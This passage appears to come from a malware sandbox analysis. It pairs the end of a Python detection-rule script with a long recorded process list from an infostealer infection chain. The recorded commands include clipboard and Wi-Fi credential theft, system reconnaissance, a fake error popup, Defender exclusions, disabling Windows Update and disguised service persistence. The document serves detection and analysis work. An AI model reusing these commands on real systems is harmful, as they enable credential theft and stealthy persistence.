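    ProcEvent(CMD, r'''C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""'''),
    ProcEvent(CMD, r'C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"'),
    ProcEvent(CMD, r'C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"'),
    ProcEvent(CMD, r'C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"'),
    ProcEvent(CMD, r'C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####Host Name#### & hostname & net user & net localgroup administrators & tasklist /svc & ipconfig/all & netstat -ano & sc query type= service state= all & netsh firewall show state"'),
    ProcEvent(CMD, r'C:\Windows\system32\cmd.exe /c "ver"'),   # benign noise
    ProcEvent(CMD, r'C:\Windows\system32\cmd.exe /c "chcp"'),  # benign noise
]


if __name__ == "__main__":
    for name, image in evaluate(SAMPLE_EVENTS):
        print(f"{name:20s} {image}")
```

Each rule is deliberately narrow; the value on a real endpoint comes from seeing several of them fire from one parent within a short window, which is how the stealer stages in this report present. The two benign lines (ver, chcp) trip nothing.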
Processes
C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe
"C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\1000015002\cf2c0e9ce8.exe
"C:\Users\Admin\1000015002\cf2c0e9ce8.exe"
C:\Users\Admin\AppData\Local\Temp\1000016001\f2e8263483.exe
"C:\Users\Admin\AppData\Local\Temp\1000016001\f2e8263483.exe"
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\1000017001\80a7b281bf.exe
"C:\Users\Admin\AppData\Local\Temp\1000017001\80a7b281bf.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffd2dc2ab58,0x7ffd2dc2ab68,0x7ffd2dc2ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1512 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2132 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3004 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3012 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4156 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3028 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3220 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4396 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4724 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1664,i,15472480796689820360,17269957809707215787,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1596_133631872895951778\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\chcp.com
chcp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe
"C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe"
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Users\Admin\AppData\Local\Temp\SetupWizard.exe
SetupWizard.exe
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe
"C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe"
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
"C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\b2c2c1.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\FirstZ.exe"
C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1248_133631873168067957\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1756 -ip 1756
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 772
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1756 -ip 1756
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 896
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 928
C:\Windows\system32\winsvc.exe
"C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\SetupWizard-61e52716fb0d7ba6\SetupWizard.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 1028
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 1156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 1164
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1756 -ip 1756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 1188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 612
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1004
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1184
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1208
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3636 -ip 3636
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\chcp.com
chcp
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1200
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3636 -ip 3636
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1476
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3636 -ip 3636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 1552
C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
"C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1876 -ip 1876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1876 -s 272
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
C:\Windows\system32\net.exe
net localgroup
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2668 -ip 2668
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 480
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" start winsvc
C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
